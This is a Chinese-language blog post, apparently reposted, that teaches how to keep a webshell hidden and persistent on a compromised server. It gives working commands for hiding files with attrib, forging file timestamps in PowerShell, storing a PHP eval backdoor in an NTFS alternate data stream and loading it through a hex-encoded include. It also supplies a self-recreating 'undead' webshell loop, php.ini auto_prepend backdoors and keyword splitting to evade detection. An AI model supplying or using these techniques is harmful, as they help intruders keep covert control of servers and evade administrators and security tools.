在紅藍對抗中，我們在拿下一個服務器之后該如何讓權(quán)限維持的久一些而不被管理員輕易的發(fā)現(xiàn) ，除了Webshell要免殺，還需要注意一些隱藏技巧,因此就要在我們上傳的木馬動點手腳想辦法不被管理員以及檢測工具快速的發(fā)現(xiàn)。

0x01 Attrib隱藏文件

使用Attrib +s +a +h +r命令就是把原本的文件夾增加了系統(tǒng)文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性。

參數(shù)說明：

+r?設(shè)置只讀屬性
-r?取消只讀屬性
+a?設(shè)置存檔屬性
-a?取消存檔屬性
+s?設(shè)置系統(tǒng)屬性
-s?取消系統(tǒng)屬性
+h?設(shè)置隱藏屬性
-h?取消隱藏屬性
/s?顯示目錄下所有文件的屬性
/d?將attrib和任意命令行選項應用到目錄

執(zhí)行完命令后當前目錄下的文件即隱藏，即使開啟了顯示隱藏的文件或是dir都是看不見的

attrib?+s?+a?+h?+r?shell.php???//隱藏shell.php文件

0x02 修改文件時間屬性

當你試圖在一堆文件中隱藏自己新創(chuàng)建的文件，那么，除了創(chuàng)建一個迷惑性的文件名，還需要修改文件的修改日期。

Set-ItemProperty?-Path?2.txt?LastWriteTime?-Value?"2020-11-01?12:12:12"??//修改時間修改

Set-ItemProperty?-Path?2.txt?LastAccessTime?-Value?"2020-11-01?12:12:12"??//訪問時間修改

Set-ItemProperty?-Path?2.txt?CreationTime?-Value?"2020-11-01?12:12:12"??//創(chuàng)建時間修改

使用命令獲取文件屬性:

Get-ItemProperty?-Path?D:\1.dll?|?Format-list?-Property?*?-Force

修改某個文件夾下所有文件的創(chuàng)建和修改時間:

powershell.exe?-command?"ls?'test\*.*'?|?foreach-object?{?$_.LastWriteTime?=??Get-Date?;?$_.CreationTime?=?'2077/01/01?19:00:00'?}"

0x03 利用ADS隱藏文件內(nèi)容

通過在命令行中echo一個數(shù)據(jù)流從而創(chuàng)建一個ADS隱藏文件

echo?^<?php ?@eval($_POST['chopper']);?^>?>?mm.php:shell.jpg

我們只能看見一個index.php文件，且內(nèi)容為空，常規(guī)的文件管理器、type命令，dir命令、del命令發(fā)現(xiàn)都找不出那個shell.jpg的。通過命令行輸入完整的文件名即可通過notepad進行編輯，可以看到我們echo進去的一句話木馬。

雖然我們已經(jīng)將文件隱藏了，但是木馬并不能夠起作用，這里就需要用到文件包含，利用include函數(shù)，mm.php:shell.jpg進行hex編碼，把這個ADS文件include進去，這樣子就可以正常解析我們的一句話了。

<?php ?@include(PACK('H*','6D6D2E7068703A7368656C6C2E6A7067'));?>

0x04 不死馬

<?php
set_time_limit(0);??
ignore_user_abort(1);?
unlink(__FILE__);?????//刪除自身while(1)
{????
????file_put_contents('shell.php','<?php ?@eval($_GET[cmd]);?>');??//創(chuàng)建shell.php，這里最好用免殺的一句話
????sleep(10);????//間隔時間
}?>

在每次刪除后的10秒鐘之后又會重新生成一個新的shell.php文件，若要徹底刪除文件最好的方法是將web服務停止了再刪除。

0x05 php.ini

php.ini 中可以指定在主文件執(zhí)行前后自動解析的文件名稱，常用于頁面公共頭部和尾部，也可以用來隱藏php后門。

；在PHP文檔之前自動添加文件。
auto_prepend_file?=?"c:\tmp.txt"
;在PHP文檔之后自動添加文件。
auto_prepend_file?=?"c:\tmp.txt"

訪問任意一個php文件即可獲取webshell。

0x06 關(guān)鍵字拆分與文件包含

1.php內(nèi)容：

<?php
$a=$_POST['x'];?>

2.php內(nèi)容：

<?php include?"1.php";
@eval($a);?>

直接訪問2.php即可獲取webshell

總結(jié)

以上是生活随笔為你收集整理的mdb文件取消隐藏_webshellphp隐藏技巧的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。